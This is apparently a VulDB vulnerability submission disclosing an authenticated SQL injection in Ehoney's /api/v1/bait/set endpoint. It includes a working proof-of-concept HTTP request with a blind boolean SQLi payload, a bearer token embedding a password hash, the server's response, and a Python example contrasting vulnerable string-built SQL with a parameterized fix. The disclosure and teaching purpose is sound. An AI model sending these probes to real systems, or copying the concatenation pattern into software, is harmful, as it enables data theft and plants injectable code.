| Title | Ehoney <= v3.0.0 Authenticated SQL injection via /api/v1/bait/set route |
|---|---|
| User | Anonymous User |
| Submission | 10/26/2022 03:49 (3 years ago) |
| Moderation | 10/28/2022 07:30 (2 days later) |
| Status | Accepted |
| VulDB entry | 212414 [seccome Ehoney /api/v1/bait/set Payload sql injection] |
| Points | 17 |

## Description

Repository: https://github.com/seccome/Ehoney

The `Payload` field of the authenticated `POST /api/v1/bait/set` request is used in a SQL query without parameterization, so anyone holding a valid bearer token can append SQL of their own. The injected condition `length(database())=13` is evaluated by the database, and the response differs depending on whether it holds, which is what gives a boolean oracle for blind extraction.

## Request

```http
POST /api/v1/bait/set HTTP/1.1
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImEiLCJwYXNzd29yZCI6IiQyYSQxNCRINmVmQ0xLbFhRRnl3QXF6V0NGalB1bGhPLlU3MTlYRnhLZ1ZRN01OMTlUamhqZWo5bWcwVyIsImV4cCI6MTY2Njc3MjU4NiwiaXNzIjoiZ2luLWJsb2cifQ.GVpPi4PxprCAIiAMI7R_fko2g_9C-F9kVTFb_EbKWqo
Content-Length: 84
Content-Type: application/json
Host: x.x.x.x:8080

{
  "Payload": "' and length(database())=13 #",
  "PageNumber": 1,
  "PageSize": 1
}
```

## Response

```json
{
  "code": 200,
  "msg": "ok",
  "data": {
    "Count": 2,
    "List": [
      {
        "ID": 1,
        "BaitName": "history",
        "FileName": "",
        "BaitType": "HISTORY",
        "BaitData": "水电费收到发",
        "Creator": "admin123",
        "CreateTime": "2021-09-02 14:50:28"
      },
      {
        "ID": 2,
        "BaitName": "passwordfile",
        "FileName": "password",
        "BaitType": "FILE",
        "BaitData": "",
        "Creator": "admin",
        "CreateTime": "2021-09-02 18:02:34"
      }
    ]
  }
}
```

## Affected code

https://github.com/seccome/Ehoney/blob/aba3197bd2fe9f16e9cf4e20c1a7df4a1608c5a7/models/bait.go#L58
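The bug class in the description above, as an added Python/SQLite illustration that is not Ehoney's own code (the project is written in Go and the page's probe uses MySQL syntax): the string-concatenation pattern assumed for the query in `bait.go` sits beside the parameterized fix, and a small check shows that only the first one lets the truth of an injected condition change the result set. The table, column names and rows are constructed for the example.

```python
import sqlite3

# Constructed stand-in for Ehoney's bait table; the real schema in models/bait.go is not reproduced.
BAITS = [
    (1, "history", "HISTORY", "admin123"),
    (2, "passwordfile", "FILE", "admin"),
]


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE bait (id INTEGER, bait_name TEXT, bait_type TEXT, creator TEXT)")
    conn.executemany("INSERT INTO bait VALUES (?, ?, ?, ?)", BAITS)
    return conn


def search_vulnerable(payload):
    """Assumed shape of the flaw: the search term is spliced into the SQL text."""
    conn = _connect()
    sql = "SELECT id FROM bait WHERE bait_name LIKE '%" + payload + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_hardened(payload):
    """Fix: bind the term as a parameter, so it can only ever act as a LIKE pattern."""
    conn = _connect()
    sql = "SELECT id FROM bait WHERE bait_name LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + payload + "%",))]


# Boolean probes in SQLite syntax; the page's probe uses MySQL's database() and '#' comment.
TRUE_PROBE = "' AND 1=1 --"
FALSE_PROBE = "' AND 1=2 --"


def oracle_visible(search):
    """True when the result set depends on the truth of the injected condition."""
    return search(TRUE_PROBE) != search(FALSE_PROBE)


if __name__ == "__main__":
    print("vulnerable oracle:", oracle_visible(search_vulnerable))  # True
    print("hardened oracle:", oracle_visible(search_hardened))      # False
```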